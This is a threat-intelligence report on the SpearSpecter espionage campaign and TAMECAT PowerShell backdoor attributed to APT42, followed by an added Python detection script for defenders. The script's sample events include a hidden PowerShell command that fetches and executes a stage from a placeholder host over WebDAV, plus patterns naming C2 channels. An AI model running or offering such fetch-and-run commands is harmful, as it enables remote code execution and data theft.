Threats Feed | APT42 | Last Updated: 19/11/2025 | Author: Certfa Radar | Publish Date: 14/11/2025

Inside SpearSpecter: Precision Social Engineering and TAMECAT Malware Operations

  • Actor Motivations: Espionage, Exfiltration
  • Attack Vectors: OS command injection, Backdoor, Downloader, Dropper, Fileless malware, Baiting, Pretexting, Spear Phishing
  • Attack Complexity: Medium
  • Threat Risk: High Impact/High Probability

Threat Overview

Researchers uncovered SpearSpecter, an IRGC-IO–aligned cyber-espionage campaign targeting senior defense and government officials, alongside their family members, to expand pressure on primary targets. The group uses long-term social engineering, including WhatsApp engagement and impersonation of trusted contacts, to deliver highly personalized lures. Initial access relies on crafted meeting documents, WebDAV-based delivery, and malicious LNK shortcuts that launch TAMECAT, a modular PowerShell backdoor enabling reconnaissance, credential harvesting, browser data extraction, Outlook OST theft, screenshot capture, and encrypted exfiltration. SpearSpecter employs a resilient multi-channel C2 architecture using HTTPS, Telegram, and Discord, plus Cloudflare Workers for staging, reflecting a stealthy and persistent IRGC-linked intelligence-collection effort.

Detected Targets

Type | Description | Confidence
Sector | Defense | Verified
Sector | Government Agencies and Services | Verified
Region | Israel | Verified

FAQs

SpearSpecter and TAMECAT: What You Need to Know

Researchers uncovered a stealthy cyber espionage campaign, named SpearSpecter, attributed to Iranian intelligence-linked hackers. These attackers used tailored social engineering and custom malware to spy on high-ranking officials.

The campaign is linked to APT42, an Iranian threat group operating under the IRGC Intelligence Organization. The group is known for advanced surveillance operations.

The main objective was long-term espionage. The attackers wanted access to sensitive documents, emails, and credentials from government and defense officials.

High-ranking officials in government and defense, as well as their family members, were targeted to increase psychological pressure and access.

Attackers built personal relationships with targets through social engineering and invited them to fake meetings. Clicking the links triggered hidden malware downloads. The malware then spied on the user, stole data, and sent it back through encrypted channels like Telegram and Discord.

Because of their sensitive roles, senior officials hold valuable intelligence. The attackers sought to gather insights into defense strategies, diplomatic actions, and personal communications.

They used custom malware called TAMECAT, which runs in memory and communicates over encrypted channels. It can steal browser data, emails, screenshots, and even Outlook mailbox files.

This campaign was highly targeted and tailored, not aimed at the general public: it focused on individuals of strategic interest to Iranian intelligence services.

High-risk individuals should be cautious of unsolicited meeting invites, especially those involving document links. Organizations should monitor network traffic for unusual activity, block access to known C2 infrastructure, and enforce strict access controls.
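The chain described in the overview (an LNK shortcut launching a hidden PowerShell stager that pulls its next stage from a WebDAV share, then beacons over Telegram, Discord or Cloudflare Workers) can be turned into host-level triage logic, which complements the network monitoring recommended above. The following is an added example, not code from Certfa Radar or from the report; the Sysmon-like event shape, the `evil.example` host and the sample command lines are constructed for illustration.

```python
import re

SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe"}
# WebDAV UNC paths as Windows renders them, e.g. \\host@SSL\DavWWWRoot\... (pattern is an assumption)
WEBDAV_UNC = re.compile(r"\\\\[\w.-]+(?:@SSL)?(?:@\d+)?\\DavWWWRoot", re.IGNORECASE)
# Messaging and edge services the report names as C2 and staging channels
C2_SERVICES = re.compile(r"(?:^|\.)(?:api\.telegram\.org|discord(?:app)?\.com|workers\.dev)$", re.IGNORECASE)
# Flags and cmdlets typical of a hidden, in-memory PowerShell stager
STAGER_FLAGS = re.compile(
    r"-w(?:indowstyle)?\s+hidden|-e(?:nc|ncodedcommand)?\s|-nop|bypass|\biex\b|invoke-expression|downloadstring",
    re.IGNORECASE)

# Constructed sample telemetry: process-creation and network-connection events
SAMPLE_EVENTS = [
    {"type": "process", "parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": r'powershell.exe -w hidden -nop -ep bypass -c "iex (gc \\evil.example@SSL\DavWWWRoot\meeting\agenda.txt)"'},
    {"type": "process", "parent": "winword.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -Command Get-Date"},
    {"type": "network", "image": "powershell.exe", "dest": "api.telegram.org", "port": 443},
    {"type": "network", "image": "chrome.exe", "dest": "discord.com", "port": 443},
    {"type": "network", "image": "powershell.exe", "dest": "stage.example.workers.dev", "port": 443},
]

def triage(events):
    """Return (event index, reason) findings; a single event may yield several reasons."""
    findings = []
    for i, ev in enumerate(events):
        image = ev.get("image", "").lower()
        if ev["type"] == "process" and image in SCRIPT_HOSTS:
            cmd = ev.get("cmdline", "")
            if WEBDAV_UNC.search(cmd):
                findings.append((i, "PowerShell reading a WebDAV UNC path (remote stage)"))
            # Explorer as parent is what a double-clicked LNK shortcut looks like
            if ev.get("parent", "").lower() == "explorer.exe" and STAGER_FLAGS.search(cmd):
                findings.append((i, "hidden/in-memory PowerShell launched from Explorer (LNK-style)"))
        elif ev["type"] == "network" and image in SCRIPT_HOSTS:
            # A browser talking to Discord is normal; a script host doing so is not
            if C2_SERVICES.search(ev.get("dest", "")):
                findings.append((i, f"script host connecting to {ev['dest']} (messaging/edge C2 channel)"))
    return findings

if __name__ == "__main__":
    for idx, reason in triage(SAMPLE_EVENTS):
        print(f"event {idx}: {reason}")
```

The rules are deliberately narrow (script host plus a suspicious path or destination) so that a browser reaching Discord or an administrator running a plain cmdlet does not fire.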